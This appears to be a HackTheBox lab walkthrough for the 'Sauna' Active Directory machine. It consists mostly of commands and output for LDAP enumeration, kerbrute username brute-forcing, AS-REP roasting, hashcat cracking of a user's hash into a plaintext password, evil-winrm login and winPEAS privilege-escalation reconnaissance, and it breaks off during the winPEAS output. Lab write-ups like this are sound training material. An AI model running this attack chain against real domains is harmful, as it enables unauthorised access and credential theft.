Sauna
IP : 10.10.10.175
Open Ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPsslObtaining Domain Name
ldapsearch
ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCALnmap
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
netexec (formerly crackmapexec)
netexec smb 10.10.10.175 -u "" -H ""
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
dig
dig axfr @10.10.10.175 sauna.htb
dig axfr @10.10.10.175 egotistical-bank.localnslookup
nslookup
> server 10.10.10.175
Default server: 10.10.10.175
Address: 10.10.10.175#53
> 127.0.0.1
;; communications error to 10.10.10.175#53: timed out
1.0.0.127.in-addr.arpa name = localhost.
> 10.10.10.175
;; communications error to 10.10.10.175#53: timed out
;; communications error to 10.10.10.175#53: timed out
;; communications error to 10.10.10.175#53: timed out
;; no servers could be reachednslookup
SERVER <IP_DNS> #Select dns server 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe... <IP_MACHINE> #Reverse lookup of a machine, maybe...
Enumerating Domain Name
ldapsearch -x -H ldap://10.10.10.175 -b "DC=EGOTISTICAL-BANK,DC=LOCAL"
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20240123232713.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAFDcw
BsDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 133505260333874854
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOT
ISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
m Data,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGO
TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
cipals,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=E
GOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGO
TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTIC
AL-BANK,DC=LOCAL
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTIS
TICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICA
L-BANK,DC=LOCAL
objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,D
C=LOCAL
isCriticalSystemObject: TRUE
gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=Syste
m,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
dSCorePropagationData: 16010101000000.0Z
otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTIS
TICAL-BANK,DC=LOCAL
otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Servic
e Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Na
me,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-N
ame,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-NcType: 0
msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
dc: EGOTISTICAL-BANK
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST
ICAL-BANK,DC=LOCAL
# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST
ICAL-BANK,DC=LOCAL
# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC
AL
# search result
search: 2
result: 0 Success
# numResponses: 19
# numEntries: 15
# numReferences: 3
Filtering ldapsearch
ldapsearch -x -H ldap://10.10.10.175 -b "DC=EGOTISTICAL-BANK,DC=LOCAL" | grep 'dn: CN='
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCALBruteforcing Valid Usernames :
it auth by : hey , do i need kerberos preauth ? yes = valid user
./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/21/24 - Ronnie Flathers @ropnop
2024/01/21 03:48:45 > Using KDC(s):
2024/01/21 03:48:45 > 10.10.10.175:88
2024/01/21 03:48:53 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2024/01/21 03:49:41 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2024/01/21 03:49:48 > [+] VALID USERNAME: Administrator@EGOTISTICAL-BANK.LOCAL
2024/01/21 03:50:14 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2024/01/21 03:54:31 > [+] VALID USERNAME: Fsmith@EGOTISTICAL-BANK.LOCALAS-REP
Typically, when you try to request authentication through Kerberos, first the requesting party has to authenticate itself to the DC. But there is an option, DONT_REQ_PREAUTH where the DC will just send the hash to an unauthenticated user. AS-REP Roasting is looking to see if any known users happen to have this option set.
basically send key to anyone that didnt set 2FA
GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile 10.10.10.175/sauna-valid-usernames -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH sethashes.aspreroast
cat hashes.aspreroast
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:9dc49cc5acc3eaa7f5d48a1d6d39a78b$0fcca43bee28caafd8378c1dce5ad071b68b8641ab92b6432dbe1fe02a69ba6812b41d8f683f33649b1a2e69002840ef9437dfbe793421050738d3f5298c10c57ca734b424753cefdbecd83c8e20ebc7781053df2919e46e1a5f414940b3e0fd88cd24f395159a8867f47a282b17cf5ddf0ee457296232f940d925a5d0adc7094520a717a29b8dba5120183eaf6c929479123de1ae3889d305f8df6235e477395e01201dd54d991676103a2bad30921a735ff321574ce9a32c34f74c09df51d5fb7645614b9aa860b44b97d95a07373acabe0b2151177577fd4a87dd935b7c104a25e720a02fc9627f20206607e6dc9682c327ce71958251d89732a6d14ee11cBruteforcing hash
hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:9dc49cc5acc3eaa7f5d48a1d6d39a78b$0fcca43bee28caafd8378c1dce5ad071b68b8641ab92b6432dbe1fe02a69ba6812b41d8f683f33649b1a2e69002840ef9437dfbe793421050738d3f5298c10c57ca734b424753cefdbecd83c8e20ebc7781053df2919e46e1a5f414940b3e0fd88cd24f395159a8867f47a282b17cf5ddf0ee457296232f940d925a5d0adc7094520a717a29b8dba5120183eaf6c929479123de1ae3889d305f8df6235e477395e01201dd54d991676103a2bad30921a735ff321574ce9a32c34f74c09df51d5fb7645614b9aa860b44b97d95a07373acabe0b2151177577fd4a87dd935b7c104a25e720a02fc9627f20206607e6dc9682c327ce71958251d89732a6d14ee11c:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:9dc49cc...4ee11c
Time.Started.....: Fri Jan 26 01:05:19 2024, (16 secs)
Time.Estimated...: Fri Jan 26 01:05:35 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 699.0 kH/s (0.89ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 28%
Started: Fri Jan 26 01:05:13 2024
Stopped: Fri Jan 26 01:05:37 2024ldapdomaindump (make sure ldap port open)
ldapdomaindump -u 'EGOTISTICAL-BANK\fsmith' -p 'Thestrokes23' 10.10.10.175
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedbloodhound-python + bloodhound
bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Failed to get service ticket for SAUNA.EGOTISTICAL-BANK.LOCAL, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Done in 00M 11S
ls
20240126011451_computers.json 20240126011451_domains.json 20240126011451_groups.json 20240126011451_users.json
20240126011451_containers.json 20240126011451_gpos.json 20240126011451_ous.json
neo4j consolevalid creds : fsmith : Thestrokes23 other users :
hsmith
administrator
saunaLoggin in usign winrm
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
vil-WinRM* PS C:\Users\FSmith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Running winpeas
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\w.exe cmd
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.Checks.Checks.CreateDynamicLists(Boolean isFileSearchEnabled)
- Creating current user groups list...
- Creating active users list (local only)...
[X] Exception: Object reference not set to an instance of an object.
- Creating disabled users list...
[X] Exception: Object reference not set to an instance of an object.
- Admin users list...
[X] Exception: Object reference not set to an instance of an object.
- Creating AppLocker bypass list...
- Creating files/directories list for search...
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
[X] Exception: Access is denied
ÉÍÍÍÍÍÍÍÍÍ͹ Showing All Microsoft Updates
[X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).
ÉÍÍÍÍÍÍÍÍÍ͹ System Last Shutdown Date/time (from Registry)
Last Shutdown Date/time : 7/26/2021 9:17:31 AM
ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables
COMPUTERNAME: SAUNA
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\FSmith\AppData\Local
PSModulePath: C:\Users\FSmith\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 23
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\FSmith
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 3100
USERNAME: FSmith
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\FSmith\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\FSmith\AppData\Roaming
TMP: C:\Users\FSmith\AppData\Local\Temp
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: EGOTISTICALBANK
USERDNSDOMAIN: EGOTISTICAL-BANK.LOCAL
ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100
ÉÍÍÍÍÍÍÍÍÍ͹ Audit Settings
È Check what is being logged
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Audit Policy Settings - Classic & Advanced
ÉÍÍÍÍÍÍÍÍÍ͹ WEF Settings
È Windows Event Forwarding, is interesting to know were are sent the logs
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ LAPS Settings
È If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed
ÉÍÍÍÍÍÍÍÍÍ͹ Wdigest
È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#wdigest
Wdigest is not enabled
ÉÍÍÍÍÍÍÍÍÍ͹ LSA Protection
È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection
LSA Protection is not enabled
ÉÍÍÍÍÍÍÍÍÍ͹ Credentials Guard
È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard
CredentialGuard is not enabled
ÉÍÍÍÍÍÍÍÍÍ͹ Cached Creds
È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating saved credentials in Registry (CurrentPass)
ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Windows Defender configuration
Local Settings
Group Policy Settings
ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 1 - PromptOnSecureDesktop
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file:
PS history size:
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating PowerShell Session Settings using the registry
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ PS default transcripts history
È Read the PS history inside these files (if any)
ÉÍÍÍÍÍÍÍÍÍ͹ HKCU Internet Settings
DisableCachingOfSSLPages: 0
IE5_UA_Backup_Flag: 5.0
PrivacyAdvanced: 1
SecureProtocols: 2688
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
CertificateRevocation: 1
ZonesSecurityUpgrade: System.Byte[]
EnableNegotiate: 1
ProxyEnable: 0
ÉÍÍÍÍÍÍÍÍÍ͹ HKLM Internet Settings
ActiveXCache: C:\Windows\Downloaded Program Files
CodeBaseSearchPath: CODEBASE
EnablePunycode: 1
MinorVersion: 0
WarnOnIntranet: 1
ÉÍÍÍÍÍÍÍÍÍ͹ Drives Information
È Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 6 GB)(Permissions: Users [AppendData/CreateDirectories])
ÉÍÍÍÍÍÍÍÍÍ͹ Checking WSUS
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking KrbRelayUp
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (EGOTISTICALBANK) so it could be vulnerable.
È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
ÉÍÍÍÍÍÍÍÍÍ͹ Checking If Inside Container
È If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
ÉÍÍÍÍÍÍÍÍÍ͹ Checking AlwaysInstallElevated
